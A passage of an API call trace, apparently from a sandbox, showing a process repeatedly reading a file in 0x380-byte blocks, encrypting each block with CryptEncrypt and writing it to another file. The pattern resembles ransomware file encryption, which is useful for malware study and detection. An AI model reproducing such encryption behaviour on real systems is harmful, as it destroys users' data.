lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.843] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.843] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.843] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.843] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.843] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.843] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.843] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.843] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.843] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.844] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.844] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.844] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.844] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.844] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.844] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.844] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.844] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.844] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.844] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.844] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.844] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.844] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.845] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.845] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.845] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.845] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.845] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.845] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.845] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.845] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.845] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.845] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.845] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.845] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.845] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.845] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.846] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.846] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.846] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.846] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.846] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.846] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.846] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.846] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.846] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.846] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.846] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.846] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.846] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.846] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.847] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.847] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.847] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.847] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.847] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.847] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.847] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.847] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.847] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.847] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.847] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.847] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.847] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.847] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.848] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.848] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.848] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.848] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.848] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.848] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.848] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.848] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.848] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.848] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.848] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.849] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.849] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.849] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.849] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.849] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.849] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.849] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.849] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.849] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.849] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.849] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.850] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.850] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.850] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.850] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.850] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.850] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.850] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.850] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.850] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.850] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.850] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.850] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.850] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.850] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.850] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.850] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 